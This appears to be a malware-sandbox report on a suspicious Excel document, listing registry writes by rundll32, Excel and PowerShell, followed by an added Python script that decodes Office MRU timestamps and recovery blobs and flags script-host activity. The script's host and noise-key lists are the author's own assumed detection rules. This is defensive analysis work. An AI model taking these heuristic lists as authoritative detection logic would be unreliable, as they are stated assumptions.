3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5044 | Latvian (QWERTY)
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5088 | Lithuanian
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5121 | Armenian Western
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5164 | Sorbian Extended
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5174 | Macedonian (FYROM) - Standard
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5182 | Georgian (QWERTY)
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5105 | Hindi Traditional
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5141 | Maltese 48-Key
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5143 | Sami Extended Norway
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5136 | Bengali - INSCRIPT (Legacy)
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5131 | Syriac Phonetic
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5167 | Sinhala - Wij 9
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5171 | Inuktitut - Naqittaut
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5133 | Divehi Typewriter
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5185 | Uyghur
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5089 | Belgian (Comma)
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5137 | Finnish with Sami
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5110 | Canadian Multilingual Standard
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5125 | Gaelic
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5086 | Arabic (102) AZERTY
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5173 | Bulgarian (Phonetic)
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5087 | Czech Programmers
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5049 | Greek (319)
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5026 | United States-International
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5176 | Romanian (Programmers)
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5081 | Thai Kedmanee (non-ShiftLock)
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5179 | Ukrainian (Enhanced)
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5172 | Lithuanian Standard
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5184 | Sorbian Standard
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5181 | Georgian (Ergonomic)
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5178 | Bengali - INSCRIPT
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5142 | Sami Extended Finland-Sweden
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5180 | Bulgarian
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5050 | Greek (220) Latin
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5027 | United States-Dvorak for left hand
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5082 | Thai Pattachote (non-ShiftLock)
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5195 | Bulgarian (Phonetic Traditional)
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5051 | Greek (319) Latin
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5028 | United States-Dvorak for right hand
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5047 | Greek Latin
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5123 | US English Table for IBM Arabic 238_L
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5122 | Greek Polytonic
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @C:\Windows\system32\input.dll,-5183 | Microsoft IME
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @C:\Windows\SYSTEM32\input.dll,-5149 | Chinese (Traditional) - New Quick
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @C:\Windows\SYSTEM32\input.dll,-5067 | Chinese (Traditional) - ChangJie
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @C:\Windows\SYSTEM32\input.dll,-5111 | Chinese (Traditional) - Quick
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @C:\Windows\SYSTEM32\input.dll,-5066 | Chinese (Traditional) - Phonetic
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @C:\Windows\SYSTEM32\input.dll,-5090 | Chinese (Traditional) - New Phonetic
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @C:\Windows\SYSTEM32\input.dll,-5093 | Chinese (Traditional) - New ChangJie
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @C:\Windows\SYSTEM32\input.dll,-5091 | Chinese (Simplified) - Microsoft Pinyin New Experience Input Style
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @C:\Windows\SYSTEM32\input.dll,-5076 | Chinese (Simplified) - Microsoft Pinyin ABC Input Style
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll,-90 | Tablet PC Correction
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @%SystemRoot%\system32\input.dll,-5183 | Microsoft IME
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @C:\Windows\IME\SpTip.DLL,-102 | Speech Recognition
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-10 | Chinese Traditional DaYi (version 6.0)
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-11 | Chinese Traditional Array (version 6.0)
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-17 | Amharic Input Method (version 1.0)
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-16 | Yi Input Method (version 1.0)
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-12 | Chinese Simplified QuanPin (version 6.0)
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-14 | Chinese Simplified ZhengMa (version 6.0)
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @C:\Program Files\Windows NT\TableTextService\TableTextService.dll,-13 | Chinese Simplified ShuangPin (version 6.0)
3296 | rundll32.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E | @C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll,-91 | Tablet PC Text Insertion
3296 | rundll32.exe | delete key | HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31} | |
3296 | rundll32.exe | delete key | HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409 | |
3296 | rundll32.exe | delete key | HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\Language | |
3296 | rundll32.exe | write | HKEY_CURRENT_USER\Keyboard Layout\Preload | 2 | 00000409
3296 | rundll32.exe | write | HKEY_CURRENT_USER\Keyboard Layout\Preload | 1 | 00000410
3296 | rundll32.exe | write | HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31} | Default | {00000000-0000-0000-0000-000000000000}
3296 | rundll32.exe | write | HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31} | Profile | {00000000-0000-0000-0000-000000000000}
3296 | rundll32.exe | write | HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31} | KeyboardLayout | 67699721
3296 | rundll32.exe | write | HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31} | Default | {00000000-0000-0000-0000-000000000000}
3296 | rundll32.exe | write | HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31} | Profile | {00000000-0000-0000-0000-000000000000}
3296 | rundll32.exe | write | HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31} | KeyboardLayout | 68158480
3296 | rundll32.exe | write | HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\Language | 00000000 | 00000409
3296 | rundll32.exe | write | HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\Language | 00000001 | 00000410
3296 | rundll32.exe | write | HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000 | CLSID | {00000000-0000-0000-0000-000000000000}
3296 | rundll32.exe | write | HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000 | Profile | {00000000-0000-0000-0000-000000000000}
3296 | rundll32.exe | write | HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000 | KeyboardLayout | 67699721
3296 | rundll32.exe | write | HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000 | CLSID | {00000000-0000-0000-0000-000000000000}
3296 | rundll32.exe | write | HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000 | Profile | {00000000-0000-0000-0000-000000000000}
3296 | rundll32.exe | write | HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000 | KeyboardLayout | 68158480
3296 | rundll32.exe | delete key | HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31} | |
3296 | rundll32.exe | delete key | HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410 | |
3296 | rundll32.exe | delete key | HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000 | |
3296 | rundll32.exe | delete key | HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31} | |
3296 | rundll32.exe | delete key | HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000409 | |
3296 | rundll32.exe | delete key | HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000 | |
3296 | rundll32.exe | delete key | HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31} | |
3296 | rundll32.exe | delete key | HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410 | |
3296 | rundll32.exe | delete key | HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem | |
3296 | rundll32.exe | write | HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\LanguageProfile\0x00000409\{38445657-9381-11D6-B41A-00065B83EE53} | Enable | 0
3296 | rundll32.exe | write | HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\Language | 00000000 | 00000410
1092 | EXCEL.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems | e`7 | 6560370044040000010000000000000000000000
1092
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
1092
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
1092
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1040
On
1092
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
44040000CC4FB6525CF3D40100000000
1092
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
1092
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency
1092
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
1092
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
1092
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\118D79
118D88
04000000440400004000000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C0044006F00630075006D0065006E0074006F005F003000330030003600340035005F00460054005F00320030003100390030003400310035005F0030003000300039003000300032005F002E0078006C007300000000001700000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C00010000000000000050E893535CF3D401888D1100798D110000000000AC020000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
1092
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\118D79
118D88
––
1092
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
EXCELFiles
1317994520
1092
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1317994640
1092
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
VBAFiles
1317994500
1092
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
{BA0396A5-5F32-4B7B-9F16-174258D824DE}
1092
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\118D79
118D88
––
1092
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\118D79
1092
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery
1092
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\118F4D
118F4D
––
1092
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
25
1092
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Item 1
[F00000000][T01D4F35C53DDE9A0][O00000000]*C:\Users\admin\Desktop\
1092
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\File MRU
Max Display
25
1092
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\File MRU
Item 1
[F00000000][T01D4F35C53E03390][O00000000]*C:\Users\admin\Desktop\Documento_030645_FT_20190415_0009002_.xls
1092
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Licensing
538F6C892AD540068154C6670774E980
01000000270000007B39303134303030302D303033442D303030302D303030302D3030303030303046463143457D005A0000004F00660066006900630065002000310034002C0020004F0066006600690063006500500072006F00660065007300730069006F006E0061006C002D00520065007400610069006C002000650064006900740069006F006E000000
1092
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
25921885
1348
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
LanguageList
en-US
2340
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
LanguageList
en-US
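The registry rows above are a flattened six-field listing (PID, process, operation, key, value name, data; "delete key" rows carry only the first four). Most of it is bookkeeping: the rundll32.exe rows add a second input language (layout 0409 = en-US, 0410 = it-IT, the same 1033/1040 pair Excel then enables) and the Installer\UserData writes are MSI usage counters. What is worth decoding rather than eyeballing is in the EXCEL.EXE rows: the Office 2010 File MRU / Place MRU items carry a FILETIME in their [T...] field, and the Resiliency\DocumentRecovery and MTTT values are REG_BINARY blobs, printed as hex, that embed the opened document's path and further FILETIMEs. One caveat on the Security\Trusted Documents row: LastPurgeTime only records that Excel pruned its trust cache; a document becomes trusted when an entry appears under Trusted Documents\TrustRecords, and no such write is in this listing. The script below is an added example written for this page, not ANY.RUN code: it parses a listing in this layout, decodes the MRU timestamps, carves UTF-16 strings and plausible FILETIMEs out of hex values at any byte offset, and returns the rows an analyst should look at first. The sample rows are copied from the listing above (the DocumentRecovery blob truncated after its first 238 bytes, which hold both paths and the FILETIME); the noise-key list, the host lists and the 2000–2040 plausibility window are my assumptions.

```python
"""Triage a flattened ANY.RUN registry-activity listing (added example, not ANY.RUN code)."""
import re
import struct
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import List, Optional, Tuple

EPOCH_1601 = datetime(1601, 1, 1)


def filetime_to_datetime(ft: int) -> datetime:
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) to a naive UTC datetime."""
    return EPOCH_1601 + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt: datetime) -> int:
    return ((dt - EPOCH_1601) // timedelta(microseconds=1)) * 10


@dataclass
class RegEvent:
    pid: int
    process: str
    op: str                      # "write" or "delete key"
    key: str
    name: Optional[str] = None   # value name; absent for "delete key"
    value: Optional[str] = None  # data as the report prints it (REG_BINARY as hex)


def parse_registry_listing(text: str) -> List[RegEvent]:
    """One field per line, as in the report: PID, process, operation, key, then name and data for writes."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    events, i = [], 0
    while i < len(lines):
        if i + 3 >= len(lines):
            raise ValueError(f"truncated record at field {i}")
        pid, process, op, key = lines[i], lines[i + 1], lines[i + 2].lower(), lines[i + 3]
        if op == "write":
            if i + 5 >= len(lines):
                raise ValueError(f"truncated write record at field {i}")
            events.append(RegEvent(int(pid), process, op, key, lines[i + 4], lines[i + 5]))
            i += 6
        elif op.startswith("delete"):
            events.append(RegEvent(int(pid), process, op, key))
            i += 4
        else:
            raise ValueError(f"unexpected operation {op!r} at field {i + 2}")
    return events


# Office 2010 "File MRU" / "Place MRU" item: [F<flags>][T<FILETIME hex>][O<flags>]*<path>
MRU_ITEM = re.compile(r"\[F([0-9A-F]{8})\]\[T([0-9A-F]{16})\]\[O([0-9A-F]{8})\]\*(.+)", re.I)


def decode_office_mru(value: str) -> Optional[Tuple[datetime, str]]:
    m = MRU_ITEM.fullmatch(value)
    return (filetime_to_datetime(int(m.group(2), 16)), m.group(4)) if m else None


UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){6,}")   # 6+ printable UTF-16LE characters
HEX_VALUE = re.compile(r"(?:[0-9A-Fa-f]{2}){8,}")     # REG_BINARY rendered as hex, 8+ bytes


def carve_hex_blob(hex_value: str, lo: datetime = datetime(2000, 1, 1),
                   hi: datetime = datetime(2040, 1, 1)) -> Tuple[List[str], List[Tuple[int, datetime]]]:
    """UTF-16LE strings and plausible FILETIMEs (any byte offset, lo <= t < hi) in a binary value."""
    data = bytes.fromhex(hex_value)
    strings = [m.group().decode("utf-16-le") for m in UTF16_RUN.finditer(data)]
    lo_ft, hi_ft = datetime_to_filetime(lo), datetime_to_filetime(hi)
    stamps = []
    for off in range(len(data) - 7):          # unaligned scan: the recovery record stores it at offset 202
        ft = struct.unpack_from("<Q", data, off)[0]
        if lo_ft <= ft < hi_ft:
            stamps.append((off, filetime_to_datetime(ft)))
    return strings, stamps


# Assumed rule lists, not vendor definitions.
OFFICE_HOSTS = {"EXCEL.EXE", "WINWORD.EXE", "POWERPNT.EXE"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Input-method / locale bookkeeping (the rundll32.exe rows) and MSI usage counters.
NOISE_KEYS = ("\\keyboard layout\\", "\\ctf\\", "\\languageresources\\", "\\installer\\userdata\\")


def triage(events: List[RegEvent]) -> List[Tuple[RegEvent, str]]:
    """(event, note) pairs for the rows an analyst should look at first."""
    findings = []
    for ev in events:
        k = ev.key.lower()
        if any(n in k for n in NOISE_KEYS):
            continue
        if ev.process.lower() in SCRIPT_HOSTS:
            findings.append((ev, "script host active; confirm in the process tree that the Office process spawned it"))
        elif ev.process.upper() in OFFICE_HOSTS:
            if "\\security\\trusted documents" in k:
                findings.append((ev, "Trusted Documents cache touched; check TrustRecords for an entry naming the sample"))
            elif "\\internet settings\\zonemap" in k:
                findings.append((ev, f"zone map changed: {ev.name}={ev.value}"))
            elif ev.op == "write" and ev.value:
                mru = decode_office_mru(ev.value)
                if mru:
                    findings.append((ev, f"opened {mru[1]} at {mru[0]:%Y-%m-%d %H:%M:%S} UTC"))
                elif HEX_VALUE.fullmatch(ev.value):
                    strings, stamps = carve_hex_blob(ev.value)
                    if strings or stamps:
                        when = [t.strftime("%Y-%m-%d %H:%M:%S") for _, t in stamps]
                        findings.append((ev, f"binary value carves to strings={strings} filetimes={when}"))
    return findings


RECOVERY_BLOB = (   # first 238 bytes of the 118D88 value from the listing (truncated after the FILETIME)
    "040000004404000040000000"
    "43003A005C00550073006500720073005C00610064006D0069006E005C00"          # C:\Users\admin\
    "4400650073006B0074006F0070005C0044006F00630075006D0065006E0074006F005F00"  # Desktop\Documento_
    "3000330030003600340035005F00460054005F0032003000310039003000340031003500"  # 030645_FT_20190415
    "5F0030003000300039003000300032005F002E0078006C007300"                  # _0009002_.xls
    "0000000017000000"
    "43003A005C00550073006500720073005C00610064006D0069006E005C00"
    "4400650073006B0074006F0070005C00"                                      # C:\Users\admin\Desktop\
    "0100000000000000"
    "50E893535CF3D401"                                                      # FILETIME, little-endian
    "888D1100798D110000000000AC02000000100000"
    "0000000000000000"
)

SAMPLE = "\n".join([   # constructed sample: rows copied from the listing above, one field per line
    "1092", "EXCEL.EXE", "write",
    r"HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel", "MTTT",
    "44040000CC4FB6525CF3D40100000000",
    "1092", "EXCEL.EXE", "write",
    r"HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\118D79", "118D88",
    RECOVERY_BLOB,
    "1092", "EXCEL.EXE", "delete key",
    r"HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery",
    "1092", "EXCEL.EXE", "write",
    r"HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\File MRU", "Item 1",
    r"[F00000000][T01D4F35C53E03390][O00000000]*C:\Users\admin\Desktop\Documento_030645_FT_20190415_0009002_.xls",
    "1092", "EXCEL.EXE", "write",
    r"HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents", "LastPurgeTime", "25921885",
    "1348", "powershell.exe", "write",
    r"HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E", "LanguageList", "en-US",
    "3296", "rundll32.exe", "write",
    r"HKEY_CURRENT_USER\Keyboard Layout\Preload", "1", "00000410",
])

if __name__ == "__main__":
    for ev, note in triage(parse_registry_listing(SAMPLE)):
        leaf = ev.key.rsplit("\\", 1)[-1]
        print(f"{ev.pid:>5} {ev.process:<15} {ev.op:<10} {leaf:<22} {note}")
```

To run it over the whole listing, paste the rows (from the first PID line onward) into a file and pass `open(path).read()` to `parse_registry_listing`; the FILETIME scan deliberately walks every byte offset because Office does not keep the timestamp 4-byte aligned inside the recovery record, and the 2000–2040 window is what stops zero-runs and path bytes from matching.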

Files activity

Executable files: 0
Suspicious files: 5
Text files: 2
Unknown types: 2

Dropped files

